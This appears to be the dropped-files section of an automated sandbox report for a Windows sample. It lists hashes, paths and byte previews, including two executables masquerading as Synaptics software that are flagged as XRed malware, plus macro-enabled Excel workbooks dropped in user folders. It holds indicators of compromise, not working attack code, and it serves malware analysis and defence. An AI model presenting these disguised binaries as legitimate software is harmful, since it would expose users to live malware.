                                                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.3.6.0.<./.P.i.

                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER1950.tmp.xml

                                                                                                        Download File
                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4572
                                                                                                        Entropy (8bit):4.44513213281774
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:cvIwWl8zsBJg77aI9Wk0WpW8VY42Ym8M4JFTFcI+q84UTSZUd:uIjfTI70kt7VdJ0ISTSZUd
                                                                                                        MD5:962EF1177447DB9FF087667887BD7752
                                                                                                        SHA1:02657689C6DA88C6AE56CA36C657DC2700315F52
                                                                                                        SHA-256:51364D0194712AE448BC52BB4EC57E5E8CF9DC16BA10348B4E0C41FFF9FE6538
                                                                                                        SHA-512:D9C04E27A73ED62122BF1FDDA759EF2652C351B9387BA98C81B4AD3C43230C2D0326E04A2ED9C1503527E5BC7A1BE86CEB55E6431EEB75354BB1A02CA5D6874A
                                                                                                        Malicious:false
                                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="653872" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERF5B.tmp.dmp

                                                                                                        Download File
                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                        File Type:Mini DuMP crash report, 14 streams, Mon Dec 30 10:49:25 2024, 0x1205a4 type
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1740606
                                                                                                        Entropy (8bit):1.7239167895966154
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3072:Zjy/QeHv2hydTgiaWCiQLSCxAB5e6MZy+gVMm/bXjVfXzmA:ZjyYG2hydTg9WXB5epy+gymrjg
                                                                                                        MD5:21B9ABBA9777FBA049FEDC05F34DC2A4
                                                                                                        SHA1:8F1430D02A90127B9060284E12E76EA9047BB1E3
                                                                                                        SHA-256:4CDA2619D56FDFA8A518515BD46BDDAE61343C4425A549C48899FE677BE5BE71
                                                                                                        SHA-512:6DD34A5A7799D01FAEE8816AD86EAC0B43AB84F4122B4C4EA02782B5B1EA198FFD1D2A5D1A71410FF2F47758B8164A960864BF8D388F66E941D623643456303E
                                                                                                        Malicious:false
                                                                                                        Preview:MDMP..a..... ........zrg....................................t%..R ..........T.......8...........T...............&............5..........p7..............................................................................eJ.......8......GenuineIntel............T.......P....zrg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                        C:\ProgramData\Synaptics\RCXDBF7.tmp

                                                                                                        Download File
                                                                                                        Process:C:\Windows\Installer\MSID754.tmp
                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):771584
                                                                                                        Entropy (8bit):6.6408899377896855
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9Imr:ansJ39LyjbJkQFMhmC+6GD9p
                                                                                                        MD5:7103F3EEC43BBABE34068295157F9F1C
                                                                                                        SHA1:A35D73E54E4BA166AC30889F57FA58284881102A
                                                                                                        SHA-256:2B6DB5563D77C827F5A662CB0A05359450DB29948863F9A5556C19CE14D05305
                                                                                                        SHA-512:F8A257ABA57A1EACF8F280651E74F97D2E14F326139282ABB506764C95FB57DB9C4708BAFD1AC027B030C40A866BE2BD04B3B0BFAC82F748B147E8A17DBD7188
                                                                                                        Malicious:true
                                                                                                        Yara Hits:
                                                                                                        • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\RCXDBF7.tmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\RCXDBF7.tmp, Author: Joe Security
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                        Joe Sandbox View:
                                                                                                        • Filename: KOGJZW.exe, Detection: malicious, Browse
                                                                                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................&....................@.......................... ...................@..............................B*...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                                                                                        C:\ProgramData\Synaptics\Synaptics.exe

                                                                                                        Download File
                                                                                                        Process:C:\Windows\Installer\MSID754.tmp
                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1729536
                                                                                                        Entropy (8bit):7.489873659196219
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:49152:snsHyjtk2MYC5GDChloJfWJ255hpB14RdZ:snsmtk2arhlTJ23hg
                                                                                                        MD5:1D2237FAF8E6198625010CB580280901
                                                                                                        SHA1:592449BDDF763BB63C22F638CB42F71484F87F06
                                                                                                        SHA-256:78643B903379276085C5EF0092AFC5C10DEE821C5754E01BC8EF835907B16AC4
                                                                                                        SHA-512:8ABE1FF967D92C663080CAF54F315E534EA296C91474D66CD327DCCC38A3AA8685101649BB120E28F1438011596DDE4F2F83E8150C90D51529EFCE9906A5AA0B
                                                                                                        Malicious:true
                                                                                                        Yara Hits:
                                                                                                        • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                        • Antivirus: ReversingLabs, Detection: 92%
                                                                                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..............................................@..............................B*......0....................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...0...........................@..P....................................@..P........................................................................................................................................

                                                                                                        C:\Users\user\AppData\Local\Temp\13zKLTpU.xlsm

                                                                                                        Download File
                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                        File Type:Microsoft Excel 2007+
                                                                                                        Category:dropped
                                                                                                        Size (bytes):18387
                                                                                                        Entropy (8bit):7.523057953697544
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                                        MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                                        SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                                        SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                                        SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                                        Malicious:false
                                                                                                        Preview:PK..........!...5Qr...?.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5.....(..8...-.[.g.......M^..s.5.4.I..P;..!....r....}._.G.`....Y....M.7....&.m1cU..I.T.....`.t...^.Bx..r..~0x....6...`....reb2m.s.$.%...-*c.{...dT.m.kL]Yj.|..Yp..".G.......r...).#b.=.QN'...i..w.s..$3..)).....2wn..ls.F..X.D^K.......Cj.sx..E..n._ ....pjUS.9.....j..L...>".....w.... ....l{.sd*...G.....wC.F... D..1<..=...z.As.]...#l..........PK..........!..U0#....L......._rels/.rels ...(...............

                                                                                                        C:\Users\user\AppData\Local\Temp\2vhcdHp.ini

                                                                                                        Download File
                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1652
                                                                                                        Entropy (8bit):5.258890402884764
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:GgsF+0U0SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+c+pAZewRDK4mW
                                                                                                        MD5:09B48AF383E16F2084484D83D1AC1D38
                                                                                                        SHA1:C568FF88E23805CCD94EFE5E00AB32159D8B4BA9
                                                                                                        SHA-256:C9ADD594646C9C8B805B5ABDC2D39CF134D0868E54E95E36B0BD241DB950799A
                                                                                                        SHA-512:481417FBFD35E6E5A34BCDC88DA8989446B5A908B2439DAA49E54AF7FF6F3CFD67758FA1E97FD530732F349D91E250CC8EC450D47EC042BC5B1C0391F3C3CA7E
                                                                                                        Malicious:false
                                                                                                        Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="fphLzuXZze2c7GRtJGL_Ng">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                        C:\Users\user\AppData\Local\Temp\5UJEwdq.ini

                                                                                                        Download File
                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1652
                                                                                                        Entropy (8bit):5.258163327254064
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:GgsF+0cgSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+8+pAZewRDK4mW
                                                                                                        MD5:6F50B2298A65B20DE015126CCCB910C5
                                                                                                        SHA1:532148D5E8063B395DF45C8E97C0A5FE5B7842B5
                                                                                                        SHA-256:0E67D248083F3BE12E433983CCBDB682E43E9E4327663C89D935ECE260B03F78
                                                                                                        SHA-512:9C0EEC2E82476AF703D9184EC8F01510EA8EF5504A9BC664C58DB19F1C81CF0D8A4C390C30731E09C52C3ECF0DC918F73319A4454CB541210901A3DBE4A845C0
                                                                                                        Malicious:false
                                                                                                        Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="T5PLeMliz8uBaCXdckbFBw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                        C:\Users\user\AppData\Local\Temp\NgZqHbP.ini

                                                                                                        Download File
                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1652
                                                                                                        Entropy (8bit):5.251523581447559
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:GgsF+0zGSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+d+pAZewRDK4mW
                                                                                                        MD5:903A3D5716B58A0D0328F97DD67F0A39
                                                                                                        SHA1:3BC8ECCEA803B23C37A7E16BF5733F92927DFC91
                                                                                                        SHA-256:1B44BBAAC4E7AE027203A2BA7085119337E47DBABF9EAEBC77039003EDB8E237
                                                                                                        SHA-512:F9FA992478846AAAA83F78E8CAA29BC3C65CAEE73ED0E4022261B94E8807984D460D92B326D1B781263A2B6F7B763E82511DD1841DE6DFF13CEDF4524F95267C
                                                                                                        Malicious:false
                                                                                                        Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="rJ79Rbny0hs0Iz0lI7PuLg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                        C:\Users\user\AppData\Local\Temp\RgxCtnI.ini

                                                                                                        Download File
                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1652
                                                                                                        Entropy (8bit):5.270609497087012
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:GgsF+0J9SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+U+pAZewRDK4mW
                                                                                                        MD5:0B0A7B6ECAFA5EEC1824A4BE4EFF97A0
                                                                                                        SHA1:5D7286738E472395B6B51D0F437358932397D53E
                                                                                                        SHA-256:54DFA629B0BE40041382F94EC29393FAB9AC65CFCB21AF731F9C77FD9011A4DA
                                                                                                        SHA-512:2ED32719C44A15E2B8DDE0D1449974E2CF0D35C89E60879D1C956EBE78C3941F47A586244AB929E9E72D8876246D93B2AB18BEF788CB10A4787CF3CF05C47E16
                                                                                                        Malicious:false
                                                                                                        Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="LPNS3z2Nt64SH0KPlHTOpg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                        C:\Users\user\AppData\Local\Temp\Rpp91GB.ini

                                                                                                        Download File
                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1652
                                                                                                        Entropy (8bit):5.266243430971787
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:GgsF+0SbSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+T+pAZewRDK4mW
                                                                                                        MD5:ABC711D01F3F3853EB31129B274014A8
                                                                                                        SHA1:7290D801125CE0CCA56EF0A2D79A8AE8320A7993
                                                                                                        SHA-256:90DF5C0AA4009F8B8367376C3AEA2BBD596A4B0BCC54009E32AD1A1A86A836E5
                                                                                                        SHA-512:F55BEED52168A30624E96926EF81E4CE20DD6BE078B2F187AC270268F4FD08E178C7BB3BE32DB32E5B147C80F265C6F5C53803530C75D39088C4C281F496D18B
                                                                                                        Malicious:false
                                                                                                        Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="dhqPt5JFQJpuFKdsNOvViA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                        C:\Users\user\AppData\Local\Temp\VA7lTRI.ini

                                                                                                        Download File
                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1652
                                                                                                        Entropy (8bit):5.251182620746107
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:GgsF+0qSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+9+pAZewRDK4mW
                                                                                                        MD5:87EA8D3FD12DCA241E61BFEE02B5E7A7
                                                                                                        SHA1:AA7FB3A1EFB08399B3858AAC5B8BB46FA543B7B1
                                                                                                        SHA-256:0084AAB34E4FC73D8DFF7AEDD6FC182FF47ECC22C790F3BCE2BB265CF111C491
                                                                                                        SHA-512:FFC4C0A2426CF3D7460C9B048378BF016E638868D76B4BA9BBDD30CAB579C74A39591361E4811FAFAE50C0CC8E6816A701F5F58F829D6A523FAEC1A9B2C0C10F
                                                                                                        Malicious:false
                                                                                                        Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="re15fICcBm83dRt9s731Ug">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                        C:\Users\user\AppData\Local\Temp\jZWCj9C.ini

                                                                                                        Download File
                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1652
                                                                                                        Entropy (8bit):5.256610466806268
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:GgsF+08DSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+rD+pAZewRDK4mW
                                                                                                        MD5:FC462A64821299E5F6FB0D54056EE80F
                                                                                                        SHA1:8F21A65382E27694B52B9DA967D28EA5590ADFA3
                                                                                                        SHA-256:34FA8541C3C88AB83EABF231692DC98D85A677782D800C88F50F3F42100A828B
                                                                                                        SHA-512:40C09AF075C5AED7CB0DE653FDE877FA2A3074955C7E9FF5496518A4268760D457A7A33FD96B5C4FD79DE4CBFF1DBE92854DAD261C7E03ABC3DECCC098632435
                                                                                                        Malicious:false
                                                                                                        Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ATg1pzZefGsieIgU61cyHQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                        C:\Users\user\AppData\Local\Temp\lpqaOtW.ini

                                                                                                        Download File
                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1652
                                                                                                        Entropy (8bit):5.257162116479252
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:GgsF+0S3SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+t+pAZewRDK4mW
                                                                                                        MD5:5969BA7F2C997D1AA36DAFC6EAB4587A
                                                                                                        SHA1:11D6C5B25E7B469AC2BA2C46964E34FCD1998E87
                                                                                                        SHA-256:7A3BB528D271B2FE9461BBABE6DE2B9CBA3896DBFE32B75D11BE73A9E6D978EB
                                                                                                        SHA-512:A0309B77EBD536EAB603E86737AC7526CC4BEFEE6E109A00E4BD70BAA5521BEFDD2CB8DE489CB7DD3AA07611B242D85E3F178363BE3819FAB00AB94F2F61C86B
                                                                                                        Malicious:false
                                                                                                        Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="1jT1C1KnAy4kKerndQdG8A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                        C:\Users\user\AppData\Local\Temp\~$13zKLTpU.xlsm

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):165
                                                                                                        Entropy (8bit):1.3520167401771568
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:qs/FFyGff:qsyWf
                                                                                                        MD5:5C22367453CA7CD5BD7CA96C4FD55742
                                                                                                        SHA1:FC7428D064740B4E331D57098AF028AA26FBC1AE
                                                                                                        SHA-256:F5D3D989BFAC7CF7187B3665F8CB75AF84FD749DBE245E454E2F9F1AC562E543
                                                                                                        SHA-512:BE2C202040245F25CB24C7F7B44A69F0000A95984236C3AE671443C56A7E1AE05BD7ACED71979ADF1159490770A767D25F581E76540C9C653441558BAECC0C89
                                                                                                        Malicious:false
                                                                                                        Preview:.user ..t.i.n.a. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                        C:\Users\user\AppData\Local\Temp\~DFA9C25C1FD9514939.TMP

                                                                                                        Download File
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                        Category:dropped
                                                                                                        Size (bytes):32768
                                                                                                        Entropy (8bit):3.746897789531007
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:QuY+pHkfpPr76TWiu0FPZK3rcd5kM7f+ihdCF3EiRcx+NSt0ckBCecUSaFUH:ZZpEhSTWi/ekfzaVNg0c4gU
                                                                                                        MD5:7426F318A20A187D88A6EC88BBB53BAF
                                                                                                        SHA1:4F2C80834F4B5C9FCF6F4B1D4BF82C9F7CCB92CA
                                                                                                        SHA-256:9AF85C0291203D0F536AA3F4CB7D5FBD4554B331BF4254A6ECD99FE419217830
                                                                                                        SHA-512:EC7BAA93D8E3ACC738883BAA5AEDF22137C26330179164C8FCE7D7F578C552119F58573D941B7BEFC4E6848C0ADEEF358B929A733867923EE31CD2717BE20B80
                                                                                                        Malicious:false
                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                        C:\Users\user\Documents\AFWAAFRXKO.xlsm

                                                                                                        Download File
                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                        File Type:Microsoft Excel 2007+
                                                                                                        Category:dropped
                                                                                                        Size (bytes):18387
                                                                                                        Entropy (8bit):7.523057953697544
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
